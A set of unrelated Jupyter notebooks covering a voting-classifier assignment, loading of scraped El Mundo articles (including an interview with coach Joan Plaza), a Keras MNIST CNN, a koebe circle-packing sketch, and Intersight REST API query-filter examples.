TP2/08 - Voting.ipynb
###Markdown Practical Assignment 2: Analysis with Voting - Organización de Datos **Students and student IDs** * Grassano, Bruno - 103855 * Romero, Adrián - 103371 https://github.com/brunograssano/TP-Organizacion-de-datos We import the libraries ###Code import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns from sklearn.model_selection import train_test_split from sklearn.metrics import classification_report from sklearn.metrics import confusion_matrix from sklearn.metrics import roc_auc_score from sklearn.metrics import roc_curve from sklearn.model_selection import KFold, StratifiedKFold from sklearn.linear_model import LogisticRegression from sklearn.svm import SVC from sklearn.ensemble import RandomForestClassifier, VotingClassifier from sklearn import tree from preprocessing import prepararSetDeDatos from preprocessing import prepararSetDeHoldout from preprocessing import prepararSetDeValidacion from preprocessing import conversionAVariablesNormalizadas from preprocessing import expansionDelDataset from funcionesAuxiliares import mostrarAUCScore from funcionesAuxiliares import mostrarROCCurve from funcionesAuxiliares import mostrarMatrizDeConfusion from funcionesAuxiliares import escribirPrediccionesAArchivo from funcionesAuxiliares import obtenerDatasets from funcionesAuxiliares import obtenerHoldout ###Output _____no_output_____ ###Markdown We import the data and preprocess it ###Code X,y = obtenerDatasets() X = prepararSetDeDatos(X) y = prepararSetDeValidacion(y) ###Output _____no_output_____ ###Markdown Voting This model is an ensemble that combines several models, each of which votes on the class of an instance. In this case, we decided to build the ensemble from the models that gave us the best results (by the AUC-ROC metric) in the other notebooks. The chosen ones were: * Decision tree * SVM * Random Forest * Logistic regression We recreate each of these models with the best hyperparameters found in its notebook. For the preprocessing we first try the basic one, which includes all the columns that come in the dataframe. ###Code X_voting = conversionAVariablesNormalizadas(X) ###Output _____no_output_____ ###Markdown We split the dataset into training and test sets. ###Code X_train, X_test, y_train, y_test = train_test_split(X_voting, y, test_size=0.25, random_state=0) ###Output _____no_output_____ ###Markdown We initialize the models that Voting will use, each with the best hyperparameters found for it. In the case of random forest the depth was reduced somewhat. ###Code regresion_logistica = LogisticRegression(penalty = 'none', solver = "saga",max_iter = 5000) random_forest = RandomForestClassifier(n_estimators=100, random_state=0,criterion='entropy',max_depth=7) svm = SVC(C=200, kernel='rbf', gamma=0.1,probability=True) arbol = tree.DecisionTreeClassifier(random_state=117, max_depth=4, criterion = 'gini') ###Output _____no_output_____ ###Markdown We create the model and train it. ###Code voting = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft') voting.fit(X_train, y_train) ###Output _____no_output_____ ###Markdown Metric evaluation Now we make the predictions and look at the metrics. 
###Code y_pred = voting.predict(X_test) print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve'])) mostrarMatrizDeConfusion(y_pred,y_test) mostrarROCCurve(voting,"Voting",X_test,X_train,y_test,y_train) mostrarAUCScore(voting,"Voting",X_test,y_test) ###Output _____no_output_____ ###Markdown We observe an improvement over the other models in several of the metrics, if not all of them. With another preprocessing We now check whether we can improve this result using the expanded dataframe. ###Code X = expansionDelDataset(X) X.head() columnas_codificables_extra = ['pago_categorizado','edades_estratificadas','categoria_invitados'] columnas_numericas_extra = ['2_clusters','4_clusters','10_clusters','cantidad_total_invitados','total_pagado'] X_voting_exp = conversionAVariablesNormalizadas(X,columnas_codificables_extra,columnas_numericas_extra) X_train, X_test, y_train, y_test = train_test_split(X_voting_exp, y, test_size=0.25, random_state=0) voting_exp = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft') voting_exp.fit(X_train, y_train) ###Output _____no_output_____ ###Markdown We evaluate ###Code y_pred = voting_exp.predict(X_test) print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve'])) mostrarROCCurve(voting_exp,"Voting",X_test,X_train,y_test,y_train) mostrarAUCScore(voting_exp,"Voting",X_test,y_test) ###Output _____no_output_____ ###Markdown We see that it got worse when using all of the new information. Yet another preprocessing We check whether removing some columns changes anything. We drop the 10-cluster result and the total number of guests. ###Code columnas_codificables_extra = ['pago_categorizado','edades_estratificadas','categoria_invitados'] columnas_numericas_extra = ['2_clusters','4_clusters','total_pagado'] X_voting_exp2 = conversionAVariablesNormalizadas(X,columnas_codificables_extra,columnas_numericas_extra) X_train, X_test, y_train, y_test = train_test_split(X_voting_exp2, y, test_size=0.25, random_state=0) voting_exp2 = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft') voting_exp2.fit(X_train, y_train) ###Output _____no_output_____ ###Markdown We evaluate this preprocessing ###Code y_pred = voting_exp2.predict(X_test) print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve'])) mostrarROCCurve(voting_exp2,"Voting",X_test,X_train,y_test,y_train) mostrarAUCScore(voting_exp2,"Voting",X_test,y_test) ###Output _____no_output_____ ###Markdown It improved considerably over the previous one, but did not manage to beat the first preprocessing's metric. Predictions on the new file We now make the predictions for the newly provided file. ###Code holdout = obtenerHoldout() ids_usuarios = np.array(holdout['id_usuario']) holdout = prepararSetDeHoldout(holdout) holdout_voting = conversionAVariablesNormalizadas(holdout) ###Output _____no_output_____ ###Markdown We make the predictions and write them to the CSV file. ###Code predicciones_holdout = voting.predict(holdout_voting) escribirPrediccionesAArchivo(predicciones_holdout,"Voting",ids_usuarios) ###Output _____no_output_____
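###Markdown As a final sanity check, we can compare each base model's AUC-ROC against the ensemble's. This is a minimal sketch, assuming the estimators and the last `X_train`/`X_test` split from the cells above are still in scope (at this point that is the split built from `X_voting_exp2`).
###Code
# Fit each base estimator on its own and report its AUC-ROC,
# to contrast with the ensemble scores shown above.
for name, model in [('Logistic regression', regresion_logistica),
                    ('Random forest', random_forest),
                    ('SVM', svm),
                    ('Decision tree', arbol)]:
    model.fit(X_train, y_train)
    print(name, roc_auc_score(y_test, model.predict_proba(X_test)[:, 1]))
###Output
_____no_output_____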
scrape_mondo_doc_sp.ipynb
###Markdown 200, 1100, 2300, 4100, 6800, 8000, 8700, 10700, 14900 convert ###Code import os import json import pandas as pd import numpy as np doc_list = os.listdir("./data/mondo_scraped/contents_sp/") articles = dict() for file in doc_list: if file[-4:] == 'json': with open(os.path.join("./data/mondo_scraped/contents_sp/", file), "r") as f: articles.update(json.load(f)) len(articles) clean = {k: v for k, v in articles.items() if v is not None} len(clean) docs = pd.DataFrame.from_dict(clean, orient='index') valids = docs.loc[docs['keyfacts'].astype(bool), :] valids.shape valids.head() valids.to_pickle('./data/elmondo_es_sp.pkl') valids.iloc[7, :].apply(print); ###Output 'Trabajé en el patio de la prisión de Lleida con el Vaquilla, tras 14 años en una cárcel lo relativizas todo' [' EL MUNDO prepara la Copa del Rey con el entrenador anfitrión en el mítico Pimpi Florida ', ' "Si la Liga no es más seria se nos irá de las manos" ', ' "El Real Madrid tiene la confianza para llegar a cotas que ni ellos mismo esperan" ', ' "Barcelona, como otras veces Madrid, Unicaja o Laboral Kutxa, está rehaciendo lo andado" ', ' "O mejoramos todos la calidad del producto o será difícil que esto no se convierta en una Liga menor" ', " Un 'beatle' en el templo de la Copa "] En las paredes, plantillas añejas del Unicaja, entre fotos de folclóricas, Garbajosa con el fisio de los Toronto Raptors o guiños de la selección a un taberna que huele a mar, vino, copla, Beatles y baloncesto. Joan Plaza se encontró con un santuario: El Pimpi Florida. Pregunta.-Le hemos traído aquí y confiesa que no bebe... Respuesta.-Nunca había bebido whisky hasta que me nombran entrenador del Madrid, me decían que tomara whisky porque no da resaca y lo hice, pero nunca me he tomado dos. No recuerdo estar borracho. P.- Pues ganó títulos como para emborracharse alguna vez... R.- Gané la Liga, estaba allí en medio de todo el mundo medio tirado, me puse en la piel del otro entrenador y casi me disculpé por haber ganado: lo siento. Cuando gané la Uleb, si hubiese podido desaparecer, lo hubiese hecho. Me fui a Trifunovic, y le dije: "la próxima vez ganarás tú". Acabé y me escondí, en aquel momento sólo pensaba en todos los que no habían estado: hay gente que no tienen nombres comerciales y también podrían estar aquí y haber ganado esto. Pensaba: 'pero déjate llevar'. Sentía una felicidad brutal, pero la apartaba. P.-¿Heredó esa coraza de su época como funcionario de prisiones? R.-Si has pasado 14 años en una prisión, lo relativizas todo. Cuando se pierden varios partidos seguidos aquí, en Madrid o Sevilla se dramatiza todo. Sacas conclusiones pero no te pones en la piel del jugador, periodista o directivo que se pone a la defensiva, con mucho miedo. P.-¿Algún momento movido en sus guardias nocturnas? R.-Tuve un motín bonito. Mi segunda noche en la prisión de Lleida, teníamos que quedarnos un funcionario de Granada y yo a pasar la noche con 300 internos. Esto pasa en todas las prisiones, por la noche hay menos gente. Tenía que revisar cada celda por la mirilla, que estuviesen todos dentro, los presos te saludaban [hace la peseta], oí un follón y me dijeron que subiese, que alguien se había salido de la celda. Uno de los que había estado en la fuga del Vaquilla retaba a todos para que entraran en su galería. El jefe dijo que entráramos: le abrió la cara de lado a lado con un barrote de la litera. No entraré en detalles, fue curioso. Llegué a casa manchado de sangre y dije: nunca más, no vuelvo. 
Aquella noche fue mucho más larga de lo que he dicho, hubo cortes de venas, barrigas...Trabajé en el patio de la prisión de Lleida con el Vaquilla. Tres años en la prisión de jóvenes y diez en la otra. El entrenador del Unicaja Joan Plaza en el Pimpi Florida, Málaga. CARLOS DÍAZ "A la gente le gustaría ir más rápido con la progresión del Unicaja pero sería como cocer y freír todo lo que hay aquí muy rápido...no sirve". P.- Bueno, esa experiencia le serviría en según qué banquillos de la NBA... R.- La tipología de entrenador allí, excepto Popovic en San Antonio y alguno más, son ex jugadores que toleran que el jugador, profesional de por sí, trabaje en el partido y no tanto en el entrenamiento,que tenga una vida mucho más distinta al concepto que tenemos más en Europa. Ojalá se dé esa circunstancia. Siempre he dicho que es verdad que me gustaría entrenar equipos grandes, llevar la Selección Española, la NBA, pero también he dicho muchas veces que si eso no ocurre pero eso tira de ti para que cada día seas mejor, pues bienvenido. Es mi zanahoria, puede ser que nunca pase nada, pero estoy contento de los proyectos que tengo. Me halaga que la gente piense que eres capaz de revertir una situación complicada en algunos clubes. Me gusta volver a Madrid, como volví a Sevilla, y que haya personas de pie aplaudiéndote. Eso es que algo bueno has hecho, y de momento pasa en todos los sitios donde estuve. Hay mucha gente que ha ayudado a que eso sea así y estoy muy orgulloso. .P- ¿Qué tal en Málaga?, ¿Qué le parece la ciudad? R.- Percibo que la sociedad malagueña es más cosmopolita de lo que esperaba. Gente más tolerante, aunque no sea tan monumental como Sevilla, donde fui muy feliz, es cierto que hay un riqueza que no es constatable, no es física. Veo a gente con mucha más capacidad de creación, el movimiento que me explican del mundo de la música, el cine que se mueve entre bambalinas, lugares tan peculiares como éste... Se acerca más a la idea de ciudad de Barcelona de lo que yo esperaba. La gente es mucho más abierta y es un lugar donde poder saca muchos recursos literarios, hay margen y gente peculiar como para que puedan salir reflejadas en tus novelas. P.-¿Así que incentiva esa faceta suya de escritor? R.- No puedo considerarme escritor si juzgo que una persona está preparada para ello como yo lo estoy para entrenar. Un día empecé a escribir estando en prisión una novela que se ha publicado en tres idiomas distintos, que está agotada, los 300 únicos ejemplares que hay en castellano. Está a punto de llegar aquí, pero me sorprende que se haya vendido o que me llegue gente hablando de ello. En Estambul [en el hotel del Unicaja en Euroliga] se presentó un argentino a hablar del libro y me parece algo espectacular porque son anotaciones al viento, son anotaciones en forma novelada que han despertado la inquietud en un tipo de gente y que sólo pretenden estimular que la gente pelee por sus sueños. Mi novela no tiene más sentido que este. Me gusta que sea un libro de cabecera para mucha gente, en Lituania, la última semana antes de irme hicimos una firma de libros y se presentó una persona con 50 notas de distintos colores en distintas hojas con sus reflexiones personales. Me parece increíble porque yo no tengo la formación para ser escritor, pero se han vendido todas las que he escrito, la segunda novela espero que salga este mismo año. 
Siempre dejo guiños a los lugares en los que he vivido, sería muy buena señal que estuviese aquí el tiempo suficiente y no me echaran antes de tiempo como para que dejara reflejado en mis novelas mi paso por Málaga, por el Pimpi Florida y otros muchos lugares. P.- ¿Cómo llega su equipo a la Copa? R.-Sólo nos planteamos mejorar los números de los años anteriores, eso no oculta que seamos ambiciosos. A la gente le gustaría ir más rápido pero sería como cocer y freír todo lo que hay aquí muy rápido...no sirve. Para que perdure en años y que no sea sólo una temporada, hay que hacerlo de una forma lenta y dura. Contento, el equipo va a más. P.- Pero le está costando reconciliar a la afición con el equipo a pesar de que la temporada no es mala, ¿Le hace falta una gran gesta? R.-Es probable que esa sea una de las recetas. Más allá de la seriedad de este proyecto o que ahora haya mejores números que el año pasado con menos presupuesto, sería un gran subidón una buena Copa del Rey, no sólo ganándola, que sería mucho, pero compitiendo hasta la final. Hacer unos 'play-offs' duros, serios. Hemos de recuperar a toda la gente que ha salido de este proyecto y ahora lo vive colateralmente para que vuelvan dentro de la dinámica del equipo. Una Copa del Rey nos ayudaría a estar arriba. P.- ¿Se quedará con Domantas Sabonis? R.- El club demandaba, y yo entendía que era cierto, que tiene una gran cantera detrás que o se apuesta o no por ella. Los juniors ha sido subcampeones en el torneo de Hospitalet, los infantiles han ganado su torneo. El equipo LEB está en buena tesitura y no podemos jugar a dos barajas: o jugamos la de no cantera y nos olvidamos del tema o la jugamos, pero en ese caso hay que hacerlo en serio. Tenemos un jugador con un potencial como el de Sabonis, Todorovic, Maodo...Son jugadores con potencial de ser muy importantes en uno o dos años. Si tenemos la suerte de que Sabonis siga el año que viene, que es la gran duda, la inversión de este año la recogeremos el año que viene o el siguiente. P.- Pero el hombre a convencer es Sabonis, Arvydas; padre de la criatura... R.- Sí, se debe encontrar en una situación complicada porque quiere que el chico siga estudiando. Domantas es un buen estudiante, tiene la opción de poder ir a universidades americanas y tiene que decidir ya no en verano, sino antes, porque de lo contrario esta apuesta quedará como un brindis al sol y no servirá para nada. Habría que replantearlo y quizás pensar en otro jugador que ocupara esa plaza. Pero ahora los jugadores que están en el junior, el LEB y el cadete ven que el primer equipo no está tan lejos, que no es tan difícil. Nos gustaría tener jugadores malagueños o criados en la cantera de una forma más regular como hubo hace unos años, pero eso requiere un tiempo, un proceso. No he hablado con él del tema, vendrá a la Copa del Rey; hablé con él en Lituania pero no de ese tema. P.-¿Cómo ve al Real Madrid? R.-Tienen una confianza que les puede hacer estar cerca de completar la temporada perfecta. No fallar ni una, están cerca de esa capacidad no sólo porque técnicamente son muy buenos y tienen una plantilla muy compensada, sino porque tienen un nivel de autoconfianza brutal y eso les puede llevar a cotas que ni ellos mismo esperaban. P.-¿Y qué le pasa al Barcelona? El entrenador del Unicaja Joan Plaza posa tras la barra del Pimpi Florida, Málaga. 
CARLOS DÍAZ "Sabonis tiene la opción ir a universidades americanas y tiene que decidir antes de verano, porque de lo contrario esta apuesta será un brindis al sol, no servirá para nada". R.- Lo que a veces le ha pasado a otros grandes como el Real Madrid, que la reconversión no se ha hecho a tiempo y cuando la vas a hacer tienes que cambiar muchas piezas. Hay proyectos que se erosionan con el tiempo y es muy difícil mantener el status quo que has tenido durante varios años. El secreto del deporte profesional es reconocer el momento en el que estás perdiendo facultades y no atrincherarte sino empezar a cambiar. Barcelona, como otras veces Madrid, Baskonia y Unicaja, está rehaciendo lo andado. P.-¿Debió prever el cambio? R.-Sí, o Baskonia que muchos años ha estado por encima de sus posibilidades: vendían y se mantenían arriba. Este año por fin demostraron que son humanos y necesitarán un tiempo para estar arriba. P.-Y la ACB, ¿necesita cambiar? R.- Está en un punto no tanto crítico como de reinventarse otra vez. Hay que anticiparse al problema que viene, no sólo que la gente sufre para llenar los pabellones, sino que hay una Euroliga que crece exponencialmente, los sponsors se giran a la liga más fuerte. O damos un paso adelante y hacemos una liga más seria, competitiva y organizada o se nos escapará de las manos. P.- Aunque ganó varios títulos, vivió el año pasado lo que viven algunos en la ACB esta campaña: trabajar sin cobrar, ¿Qué le parece? R.- Cobré hasta enero aunque el banco se declaró en bancarrota y deben dinero de la primera parte del año, la segunda parte la cobraré en tres o cuatro años. También es difícil encontrar a un entrenador que en su carrera le hayan pagado puntual siempre. Tuve que vivir esa experiencia y decidir si dejarlo todo y venir a España o seguir hasta el final. Decidí quedarme, ganamos la Liga y ha sido beneficioso para mí y para los que estuvieran a mi lado. Me preocupa mucho que haya jugadores y entrenadores que estén por debajo del mínimo interprofesional que está estipulado por la propia ACB. Todos lo sabemos y nos cuesta no arreglarnos. A lo mejor hemos de ir a una Liga un poco más corta, donde la competitividad sea mayor, donde no hayan tantas diferencias en el marcador pero en el que se pague lo que se pacte al inicio de la temporada. Es importante que hagamos un baloncesto atractivo, hay más competitividad que antes, el fútbol sigue atrayendo a gran parte de la oferta que hay. O mejoramos todos la calidad del producto o será difícil que esto no se convierta en una Liga menor. P.-Catalán y ex del Real Madrid, ¿qué le parece la consulta? R.-Una de las cosas buenas que podemos hacer en esta vida es coger una maleta e irte. Cuando me fui de Barcelona a Madrid me sorprendió que la realidad que se explicaba en Madrid era muy distinta a la que vivía en Barcelona. ¿Cual era cierta? Ninguna de las dos, no es cierto lo que decían los medios catalanes ni lo que explicaban en Madrid. Hablaba con gente en Madrid porque la idea que se explicaba era equivocada, y les decía que no me hicieran caso: llamemos a Aíto García Reneses que es madrileño, vive en Cataluña desde hace muchos años y que él os dé la perspectiva. Pero escuchad a la gente que vive allí, no os guiéis por lo que veis por televisión porque se vende una crispación que no existe como tal, pero es a la que mucha gente saca partido. P.- ¿Perdió amigos por el asunto? R.- No, pero me he dado cuenta de que mucha gente no es capaz de ponerse en tu piel. 
Fui entrenador del Real Madrid y estoy orgullosísimo de haberlo sido, tengo amistades allí que no quiero perder nunca en mi vida. Pero hay mucha gente muy radical a la que le cuesta entender que quien te ha dado la primera oportunidad de primer nivel mundial es el Real Madrid, y yo soy catalán. Soy el primer catalán de la historia que entrena al Madrid de baloncesto y probablemente al de fútbol. Estoy orgulloso de haberlo vivido, he aprendido un montón, soy más capaz, más listo, pero también le pasará lo mismo a Aíto que ha estado en Barcelona durante 40 años. Las fronteras que nos montamos a veces son bastante ingenuas. P.- Metidos en harina, y con sus antecedentes habrá que preguntarle por la 'doctrina Parot'... R.- Hay que estar en la piel del otro, tener un gran nivel de empatía. Cuando alguien sufre en sus carnes lo que sufre una de estas personas que luego se ha podido acoger a la doctrina Parot es normal que estén molestas o dolidas, pero entendiendo ese dolor, lo que está claro es que hay una ley que hay que mejorar. La ley, no sólo la penitenciaria, también la ley general en este aspecto. Hay que mejorar y ceñirnos todos a la misma, nos guste o no. Hay que encontrar la manera en la que podemos mejorarla si creemos que es posible. En la vida, estoy enfermo de esto, hay que ser empáticos, hay que saber por qué se protesta, por qué se acomodan, por qué no lo hacen... P.- Bueno, Joan, antes de la Copa, ¿Por qué brinda? R.- Porque tenemos el tren sobre las vías y estamos en condiciones. No esperábamos la posición en Liga, el equipo desprende cosas importantes y estamos recolectando gente que estaba desengañada. Pidamos más carbón para la caldera. Ser cabezas de serie es un gran empuje,pero creo en las cosas progresivas, no en las varitas mágicas. El Madrid es el claro favorito, si sigue con esta autoridad será difícil rebatírselo y habrá que competir en nuestra liga que es más abajo. [] 2014-02-03
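###Markdown A minimal sketch of loading the pickled frame back for downstream work (assuming the file written above exists):
###Code
import pandas as pd

# Reload the cleaned article frame and confirm it matches `valids` above.
reloaded = pd.read_pickle('./data/elmondo_es_sp.pkl')
reloaded.shape
###Output
_____no_output_____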
notebook/mnist_cnn.ipynb
###Markdown Trains a simple convnet on the MNIST dataset. ###Code '''Trains a simple convnet on the MNIST dataset. Gets to 99.25% test accuracy after 12 epochs (there is still a lot of margin for parameter tuning). 16 seconds per epoch on a GRID K520 GPU. ''' from __future__ import print_function import keras from keras.datasets import mnist from keras.models import Sequential from keras.layers import Dense, Dropout, Flatten from keras.layers import Conv2D, MaxPooling2D from keras import backend as K batch_size = 128 num_classes = 10 epochs = 12 # input image dimensions img_rows, img_cols = 28, 28 # the data, shuffled and split between train and test sets (x_train, y_train), (x_test, y_test) = mnist.load_data() if K.image_data_format() == 'channels_first': x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols) x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols) input_shape = (1, img_rows, img_cols) else: x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1) x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1) input_shape = (img_rows, img_cols, 1) x_train = x_train.astype('float32') x_test = x_test.astype('float32') x_train /= 255 x_test /= 255 print('x_train shape:', x_train.shape) print(x_train.shape[0], 'train samples') print(x_test.shape[0], 'test samples') # convert class vectors to binary class matrices y_train = keras.utils.to_categorical(y_train, num_classes) y_test = keras.utils.to_categorical(y_test, num_classes) model = Sequential() model.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=input_shape)) model.add(Conv2D(64, (3, 3), activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Dropout(0.25)) model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(num_classes, activation='softmax')) model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy']) model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_test, y_test)) score = model.evaluate(x_test, y_test, verbose=0) print('Test loss:', score[0]) print('Test accuracy:', score[1]) ###Output Using TensorFlow backend.
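###Markdown As a quick follow-up (a minimal sketch, assuming `model`, `x_test`, and `y_test` from the cell above are still in scope), we can inspect a few individual predictions:
###Code
import numpy as np

# Predict class probabilities for the first five test digits and compare
# the argmax prediction with the one-hot encoded ground truth.
probs = model.predict(x_test[:5])
for pred, truth in zip(np.argmax(probs, axis=1), np.argmax(y_test[:5], axis=1)):
    print('predicted:', pred, 'actual:', truth)
###Output
_____no_output_____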
Example Notebooks/Bubble Generator.ipynb
###Markdown Step 1: Generate a random convex hull ###Code from koebe.algorithms.incrementalConvexHull import randomConvexHullE3WithHighDegreeVertex mesh = randomConvexHullE3WithHighDegreeVertex(100, 20) mesh.outerFace = mesh.verts[-1].remove() # Run this block if you want to see the mesh from koebe.graphics.spherical2viewer import * viewer = S2Viewer(600,600) viewer.toggleSphere() # Hide the sphere viewer.addAll(mesh.edges) viewer.show() ###Output _____no_output_____ ###Markdown Step 2: Circle pack the convex hull ###Code from koebe.geometries.euclidean2 import PointE2 from koebe.algorithms.hypPacker import * def orthProj(p): return PointE2(p.x, p.y) dists = [(orthProj(v.data) - PointE2.O).normSq() for v in mesh.verts] closestToOriginIdx = dists.index(min(dists)) packing, _ = maximalPacking( mesh, num_passes=1000, centerDartIdx = mesh.darts.index(mesh.verts[closestToOriginIdx].aDart) ) # Run this to view the circle packing from koebe.graphics.euclidean2viewer import PoincareDiskViewer, makeStyle viewer = PoincareDiskViewer(600, 600) viewer.addAll(packing.verts) #d = DiskOP2(1,0,0,-1) #viewer.add(d) #viewer.setStyle(d, makeStyle(fill='#00ff00')) viewer.show() from koebe.algorithms.inversiveVoronoi import inversiveVoronoi as IV from koebe.geometries.orientedProjective2 import DiskOP2 sgPacking = packing.duplicate( vdata_transform = lambda vData : DiskOP2.fromCircleE2(vData.toPoincareCircleE2()).toDiskS2() ) # Run this block if you want to see the mesh from koebe.graphics.spherical2viewer import * viewer = S2Viewer(600,600) viewer.toggleSphere() # Hide the sphere viewer.addAll(sgPacking.verts) blueStyle = makeStyle(stroke="#00f", strokeWeight=1, fill="rgba(255, 255, 255, 0.5)") for v in sgPacking.verts: viewer.setStyle(v, blueStyle) viewer.show() arcs = IV(sgPacking) arcs2D = [arc.sgToCircleArcOP2() for arc in arcs] disks2D = [v.data.sgProjectToOP2() for v in sgPacking.verts] # TODO: implement the toSVG method here (toSVG and svgFilePath are not defined yet). arcs2D[0] # Something along these lines print("Writing SVG file...") svgStr = toSVG(512.0) f = open(svgFilePath, 'w') f.write(svgStr) f.close() print("Done.") ###Output _____no_output_____
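###Markdown The `toSVG` helper called in the last cell does not exist yet. Below is a minimal sketch of what it could look like; it builds SVG markup from plain `(cx, cy, r)` tuples rather than from koebe's `DiskOP2`/`CircleArcOP2` objects, since the accessor names for extracting centers and radii depend on the koebe geometry API. The signature and input format are assumptions, not part of the library.
###Code
# Hypothetical sketch: renders circles given in unit-disk coordinates
# onto a size x size SVG viewport.
def toSVG(size, circles):
    scale = size / 2.0  # map [-1, 1] coordinates onto the viewport
    parts = [f'<svg xmlns="http://www.w3.org/2000/svg" width="{size}" height="{size}">']
    for cx, cy, r in circles:
        parts.append(
            f'<circle cx="{cx * scale + size / 2.0}" cy="{cy * scale + size / 2.0}" '
            f'r="{r * scale}" fill="none" stroke="black"/>'
        )
    parts.append('</svg>')
    return '\n'.join(parts)

# Usage: svgStr = toSVG(512.0, [(0.0, 0.0, 0.5), (0.25, 0.1, 0.2)])
###Output
_____no_output_____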
resources/ucs/intersight/intersight.ipynb
###Markdown Intersight REST API Query Parameter Usage Examples Intersight supports the use of a query language in the URI of a REST API request, as query parameters. This Notebook includes examples of using the Intersight query language to **filter results returned to the REST client, on the server/Intersight side**. This process can simplify the effort to filter results on the client side.- Filter options include: - `eq`, `ne`, `gt`, `lt`, `ge`, `le` - `$filter=NumCpus ge 4` - `and`, `or`, `not` - `($filter=NumCpus ge 4 and NumCpus le 8)` - `in` - `($filter=Model in ('HX220C-M5SX', 'UCSC-C240-M5SN'))` - `contains` - `($filter=contains(Model, B200))` - `startswith` - `($filter=startswith(Model, UCSC))` - `endswith` - `($filter=endswith(Model, M5))` - `tolower`/`toupper` - `($filter=contains(Model, toupper(b200)))`Reference: [Intersight Query Syntax](https://intersight.com/apidocs/introduction/query/ "Intersight Query Syntax") --- Import the `intersight_helper` functions Intersight API Authentication Setup**IMPORTANT**Be sure to follow the instructions [**here**](https://wwt.github.io/dcauto-study-resources/sections/section_4/hands-on-learning ) before you attempt to run the next and subsequent cells in this notebook. ###Code # Setup exception handling for the Intersight authentication process try: # Attempt to import the functions in the `intersight_helper` module - this import attempts Intersight authentication. from intersight_helper import * from requests import HTTPError # Handle missing keyId.txt and keySecret.txt files except FileNotFoundError as e: print('Unable to locate authentication key and signature file combination.') print(f'{e!r}') print(f'{e.filename!r}') ###Output _____no_output_____ ###Markdown Test to determine if authentication and authorization are successful. ###Code # Determine if the keyId.txt and keySecret.txt files successfully authenticate try: results = intersight( method='GET', endpoint='/compute/Blades' ) except HTTPError as e: print('The Intersight authentication process failed.\n' 'Please be sure to follow the "Intersight API Authentication Setup" directions above before continuing.') # The Intersight API authentication and authorization process is successful if you see `200 OK` below ###Output HTTP response: 200 OK Objects returned: 18 ###Markdown --- Create a helper function to display query results. ###Code from typing import Dict, List def display_results( results: Dict, fields: List = None ) -> None: """ Helper function to display query results. Args: results (Dict): Dictionary of results returned by the Intersight API call. fields (List, optional): Optional List of dictionary fields to display. 'Dn' is automatically included. Returns: None. 
""" # Alias results['Results'] results = results.get('Results', list()) # Check count of results if len(results) == 0: print('No results found.') return for index, result in enumerate(results): # Display current and total results count print(f'{index + 1} of {len(results)}') # Display the 'Dn' for each result print(f'DN: {result.get("Dn", "N/A")}') # Display any optional fields if fields is not None: for field in fields: print(f'\t{field}: {result.get(field, "N/A")}') print() ###Output _____no_output_____ ###Markdown --- Examples Filter for specific resources, using matching criteria ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$filter=NumCpus ge 4' ) # Display the results display_results( results=results, fields=[ 'Model', 'NumCpus' ] ) ###Output HTTP response: 200 OK Objects returned: 2 1 of 2 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 NumCpus: 4 2 of 2 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 NumCpus: 4 ###Markdown --- Return/select only certain matching properties ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$select=Model,Dn,Serial' ) # Display the results display_results( results=results, fields=[ 'Model', 'Serial' ] ) ###Output HTTP response: 200 OK Objects returned: 18 1 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 2 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 3 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 4 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 5 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 6 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 7 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 8 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 9 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 10 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 11 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 12 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 13 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 14 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 15 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 16 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 17 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 18 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 ###Markdown --- Pagination, return the top N results only ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$top=3' ) # Display the results display_results( results=results, fields=[ 'Model', 'Serial', 'NumThreads' ] ) ###Output HTTP response: 200 OK Objects returned: 3 1 of 3 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 NumThreads: 16 2 of 3 DN: sys/chassis-5/blade-3 